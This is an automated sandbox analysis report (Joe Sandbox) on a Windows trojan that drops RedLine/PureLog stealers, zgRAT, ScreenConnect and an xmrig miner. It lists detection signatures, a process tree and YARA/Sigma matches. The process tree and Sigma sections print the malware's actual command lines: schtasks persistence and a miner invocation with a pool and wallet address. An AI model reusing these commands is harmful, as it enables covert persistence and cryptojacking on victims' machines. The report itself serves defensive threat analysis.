Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RPHbzz3JqY.exe

Overview

General Information

Sample name:RPHbzz3JqY.exe
renamed because original name is a hash value
Original sample name:848abdbd09c052799a0e0180b59f6fee.exe
Analysis ID:1479881
MD5:848abdbd09c052799a0e0180b59f6fee
SHA1:2f73b04baf17c3a9f9d21f6f324d64306a10682c
SHA256:1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109
Tags:32exetrojan
Infos:

Detection

ScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to hide user accounts
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected ScreenConnect Tool
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RPHbzz3JqY.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\RPHbzz3JqY.exe" MD5: 848ABDBD09C052799A0E0180B59F6FEE)
    • schtasks.exe (PID: 6684 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explert.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" MD5: 848ABDBD09C052799A0E0180B59F6FEE)
  • explert.exe (PID: 2852 cmdline: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe MD5: 848ABDBD09C052799A0E0180B59F6FEE)
    • schtasks.exe (PID: 2004 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • IIZS2TRqf69aZbLAX3cf3edn.exe (PID: 6612 cmdline: "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
      • gtxkvh.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\Temp\gtxkvh.exe" MD5: 631670BEA7DD01CB347C389294714438)
        • schtasks.exe (PID: 6892 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Cerker.exe (PID: 6420 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 631670BEA7DD01CB347C389294714438)
      • AddInProcess.exe (PID: 6560 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
      • AddInProcess.exe (PID: 2704 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
    • HM3SOlbpH71yEXUIEAOeIiGX.exe (PID: 7064 cmdline: "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe" MD5: 4F5771AA008FB55801A3F9FBA7130F69)
      • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 4092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • explert.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" MD5: 848ABDBD09C052799A0E0180B59F6FEE)
  • explert.exe (PID: 2004 cmdline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" MD5: 848ABDBD09C052799A0E0180B59F6FEE)
  • sys_updater.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
  • sys_updater.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
  • sys_updater.exe (PID: 2380 cmdline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
  • sys_updater.exe (PID: 5296 cmdline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
  • Cerker.exe (PID: 6320 cmdline: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe MD5: 631670BEA7DD01CB347C389294714438)
  • Cerker.exe (PID: 6092 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 631670BEA7DD01CB347C389294714438)
  • Cerker.exe (PID: 6732 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 631670BEA7DD01CB347C389294714438)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerSziabjyahisyguwsiggswiwygisigNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Click to see the 11 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000018.00000003.2663527189.0000021E030A4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              0000001B.00000003.2780772219.00000159F38CB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                00000018.00000003.2686476457.0000021E03768000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  0000001B.00000003.2794263235.00000159F3891000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
                  • 0xb659d:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
                  0000001B.00000003.2783975569.00000159F3470000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    Click to see the 130 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                        • 0x75421:$s1: file:///
                        • 0x7537d:$s2: {11111-22222-10009-11112}
                        • 0x753b1:$s3: {11111-22222-50001-00000}
                        • 0x6ffb0:$s4: get_Module
                        • 0x70433:$s5: Reverse
                        • 0x74b24:$s6: BlockCopy
                        • 0x707af:$s7: ReadByte
                        • 0x75433:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                        10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            Click to see the 28 entries

                            Sigma Signatures

                            Bitcoin Miner

                            barindex
                            Sigma detected: Xmrig
                            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe", ParentImage: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, ParentProcessId: 6612, ParentProcessName: IIZS2TRqf69aZbLAX3cf3edn.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 6560, ProcessName: AddInProcess.exe

                            System Summary

                            barindex
                            Sigma detected: New RUN Key Pointing to Suspicious Folder
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RPHbzz3JqY.exe, ProcessId: 6488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\explert.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RPHbzz3JqY.exe, ProcessId: 6488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\explert.exe
                            Sigma detected: Suspicious Add Scheduled Task Parent
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, ParentImage: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, ParentProcessId: 2852, ParentProcessName: explert.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, ProcessId: 2004, ProcessName: schtasks.exe
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RPHbzz3JqY.exe", ParentImage: C:\Users\user\Desktop\RPHbzz3JqY.exe, ParentProcessId: 6488, ParentProcessName: RPHbzz3JqY.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, ProcessId: 6684, ProcessName: schtasks.exe

                            Snort Signatures

                            No Snort rule has matched

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: RPHbzz3JqY.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeAvira: detection malicious, Label: HEUR/AGEN.1319014
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeAvira: detection malicious, Label: HEUR/AGEN.1310947
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeReversingLabs: Detection: 83%
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeVirustotal: Detection: 75%Perma Link
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeReversingLabs: Detection: 83%
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeVirustotal: Detection: 74%Perma Link
                            Multi AV Scanner detection for submitted file
                            Source: RPHbzz3JqY.exeReversingLabs: Detection: 60%
                            Source: RPHbzz3JqY.exeVirustotal: Detection: 56%Perma Link
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: RPHbzz3JqY.exeJoe Sandbox ML: detected

                            Bitcoin Miner

                            barindex
                            Yara detected Xmrig cryptocurrency miner
                            Source: Yara matchFile source: 24.3.sys_updater.exe.21e0345551d.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.3.sys_updater.exe.21e034544fd.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.3.sys_updater.exe.21e034544fd.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.3.sys_updater.exe.20e49503455.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.3.sys_updater.exe.20e4950304d.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.3.sys_updater.exe.20e494ac50d.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.3.sys_updater.exe.20e494ac915.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000018.00000003.2663527189.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2780772219.00000159F38CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2686476457.0000021E03768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2783975569.00000159F3470000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2780772219.00000159F38FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2922120647.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2661359746.0000021E031A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2762360259.00000159F3465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2689396075.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2659972614.0000021E03194000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2915091882.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2770549430.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2761279906.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2759055860.00000159F38C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2661205668.0000021E03151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2686476457.0000021E03734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2686049114.0000021E03765000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2778870088.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2659255671.0000021E03635000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2915091882.0000020E49827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2689396075.0000021E03062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2961157579.0000020E498C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2686476457.0000021E0372E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2686049114.0000021E0373E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2769879693.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2659255671.0000021E0362F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2687199973.0000021E0305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2660087797.0000021E03581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2801216518.00000159F3492000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2760278744.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2666668474.0000021E031A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2767124522.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2961157579.0000020E498BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2759580916.00000159F3896000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2779479672.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2958783527.0000020E498BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2783103519.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2661521340.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2674148859.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2915091882.0000020E497F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2661677871.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2919365464.0000020E495EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2787747249.00000159F349A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2916180807.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2660087797.0000021E03530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2782126972.00000159F3464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2759055860.00000159F3897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2764776666.00000159F346C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2965569347.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2660847616.0000021E03196000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2791688116.00000159F349B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2785135937.00000159F345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2958783527.0000020E498F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2931991322.0000020E495E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2660087797.0000021E03567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2763426209.00000159F346C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2660847616.0000021E03140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2916180807.0000020E495EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2661128058.0000021E03196000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2958783527.0000020E498C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2924968847.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2919365464.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2688132576.0000021E03061000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2968135446.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2785229702.00000159F3610000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2780772219.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2779479672.00000159F3898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2687808650.0000021E03516000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2687199973.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2688253860.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2923367726.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
